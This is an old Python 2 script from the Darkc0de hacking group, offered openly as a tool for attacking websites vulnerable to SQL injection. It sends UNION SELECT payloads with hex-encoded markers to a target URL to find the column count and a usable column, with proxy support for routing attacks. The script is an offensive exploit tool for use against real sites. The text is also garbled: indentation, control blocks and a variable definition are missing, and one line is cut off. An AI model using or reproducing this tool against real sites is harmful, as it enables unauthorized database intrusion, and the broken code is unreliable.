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[Python] SQLi Column Finder

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#SQLi column finder
#This script finds the number of columns in a SQLi and a null column!
#thats the short and sweet of it.
#the site must be vuln to SQLi for this to work
#If your sure its vuln to SQLi and its not finding the columns there are 2 possibilities.
#1. only vuln to blind SQLi
#2. it has over 100 columns increase to 200.. (never seen one with more than 200 columns)

# Darkc0de Team
# www.darkc0de.com
# rsauron[at]gmail[dot]com

# Greetz to
# d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx
# and the rest of the Darkc0de members

import sys, re, socket, httplib, urllib2

#Maximum Number of Columns this Script will check for!
#Change this if you think column length for target site is greater then 100
colMax = 100
#Add proxy support: Format
proxy = "None"

print "\n rsauron:darkc0de.com Column Lenth Finder v1.0"
print "---------------------------------------------------"

if len(sys.argv) != 2:
print "\n\tUsage: ./colfinder.py <vulnSQLi>"
print "\n\tEx: ./colfinder.py \"www.site.com/news.php?id=22\"\n"

siteorig = sys.argv[1]
if siteorig[:7] != "http://":
siteorig = "http://"+siteorig

if proxy != "None":
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
print "[+] Proxy:",proxy
print "[+] Building Handler"
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
print "\n[-] Proxy Not Given"
proxy_handler = ""
print "\n[-] Proxy Timed Out"
except(), msg:
print msg
print "\n[-] Proxy Failed"

print "[+] Attempting To find the number of columns..."
firstgo = "True"
site = siteorig+"+AND+1=2+UNION+SELECT+"
makepretty = ""
for a in xrange(0,colMax):
a = str(a)
darkc0de = "darkcode"+a
opener = urllib2.build_opener(proxy_handler)
if firstgo == "True":
site = site+"0x"+darkc0de.encode("hex")
firstgo = "False"
site = site+",0x"+darkc0de.encode("hex")
finalurl = site+"--"
source = opener.open(finalurl).read()
for b in checkfor:
colFound = re.findall(b,source)
if len(colFound) >= 1:
print "[+] Column Length is:",len(checkfor)
b = re.findall(("[\d]"),
print "[+] Found null column at column #:",b[0]
firstgo = "True"
for c in xrange(0,len(checkfor)):
if firstgo == "True":
makepretty = makepretty+str(c)
firstgo = "False"
makepretty = makepretty+","+str(c)
print "[+] Site URL:",siteorig+"+AND+1=2+UNION+SELECT+"+makepretty+"--"
print "[-] Done!\n"
print "[-] Sorry Column Length could not be found."
print "[-] Try increasing colMax variable. or site is not injectable"
print "[-] Done\n"

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